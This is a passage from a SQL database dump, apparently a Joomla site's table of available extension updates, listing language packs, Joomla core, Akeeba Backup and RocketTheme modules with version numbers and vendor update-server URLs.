Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7579,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7580,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7581,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7582,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7583,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7584,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7585,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7586,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7587,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7588,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7589,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7590,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7591,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7592,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7593,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7594,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7595,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7596,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7597,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7598,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7599,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7600,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7601,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7602,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7603,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7604,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7605,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7606,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7607,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7608,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7609,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7610,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7611,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7612,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7613,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7614,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7615,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7616,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7617,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(7619,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7620,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7621,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7622,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7623,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7624,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7625,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7626,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7627,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7628,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7629,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7630,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7631,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7632,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7633,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7634,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7635,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7636,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7637,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7638,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7639,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7640,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7641,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7642,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7643,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7644,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7645,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7646,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7647,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7648,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7649,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7650,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7651,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7652,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7653,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7654,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7655,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7656,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7657,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7658,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7659,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7660,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7661,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7662,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7663,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7664,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7665,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7666,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7667,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7668,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7669,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7670,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7671,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7672,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7673,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7674,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7675,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(7676,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7677,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7678,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7679,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7680,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7681,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7682,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7683,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7684,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7685,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7686,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7687,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7688,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7689,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7690,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7691,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7692,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7693,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7694,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7695,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7696,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7697,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7698,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7699,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7700,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7701,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7702,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7703,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7704,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7705,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7706,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7707,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7708,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7709,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7710,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7711,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7712,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7713,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7714,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7715,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7716,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7717,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7718,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7719,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7720,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7721,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7722,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7723,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7724,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7725,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(7726,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7727,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7728,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7729,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7730,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7731,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7732,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7733,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7734,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7735,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7736,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7737,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7738,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7739,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7740,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7741,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7742,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7743,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7744,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7745,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7746,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7747,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7748,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7749,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7750,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7751,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7752,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7753,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7754,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7755,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7756,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7757,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7758,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7759,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7760,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7761,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7762,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7763,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7764,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7765,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7766,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7767,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7768,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7769,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7770,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7771,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7772,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7773,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7774,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7775,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7776,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7777,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7778,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7779,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7780,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7781,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7782,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(7783,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7784,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7785,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7786,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7787,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7788,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7789,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7790,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7791,57,0,'Arabic 